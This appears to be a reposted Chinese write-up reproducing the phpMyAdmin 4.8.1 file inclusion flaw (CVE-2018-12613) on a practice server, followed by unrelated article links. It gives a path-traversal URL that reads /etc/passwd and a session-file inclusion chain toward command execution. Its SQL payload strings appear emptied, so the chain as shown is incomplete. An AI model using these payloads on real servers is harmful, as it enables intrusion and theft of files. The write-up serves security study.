phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)漏洞复现
本文共 425 字,大约阅读时间需要 1 分钟。
(CVE-2018-12613)
环境搭建
poc
?target=db_sql.php%253f/../../../../../../../../etc/passwd
exp
这边利用包含session文件来获取
首先在SQL处执行
select ' ';
http://node3.buuoj.cn:27757/?target=db_sql.php%253f/../../../../../../../../tmp/sess_bb17e2919e913196389bffbc020a4cfa
在ubuntu下,session文件的存放位置为/tmp文件夹下,命名为sess_+cookie,例:
sess_bb17e2919e913196389bffbc020a4cfa
这里应该也可以执行系统命令,可以构造
select ' ';
按照上面的方法再来一次就可以获取到所有的目录然后进行包含。
转载地址:http://rapbi.baihongyu.com/
你可能感兴趣的文章
Maven跳过单元测试的两种方式
查看>>
通过C++反射实现C++与任意脚本(lua、js等)的交互(二)
查看>>
利用清华镜像站解决pip超时问题
查看>>
[leetcode BY python]1两数之和
查看>>
微信小程序开发全线记录
查看>>
Centos import torchvision 出现 No module named ‘_lzma‘
查看>>
网页设计里的浮动 属性
查看>>
Maximum Subsequence Sum
查看>>
PTA:一元多项式的加乘运算
查看>>
CCF 分蛋糕
查看>>
解决python2.7中UnicodeEncodeError
查看>>
小谈python 输出
查看>>
Django objects.all()、objects.get()与objects.filter()之间的区别介绍
查看>>
python:如何将excel文件转化成CSV格式
查看>>
Django 的Error: [Errno 10013]错误
查看>>
机器学习实战之决策树(一)
查看>>
[LeetCode By Python] 2 Add Two Number
查看>>
python 中的 if __name__=='__main__' 作用
查看>>
机器学习实战之决策树二
查看>>
[LeetCode By Python]7 Reverse Integer
查看>>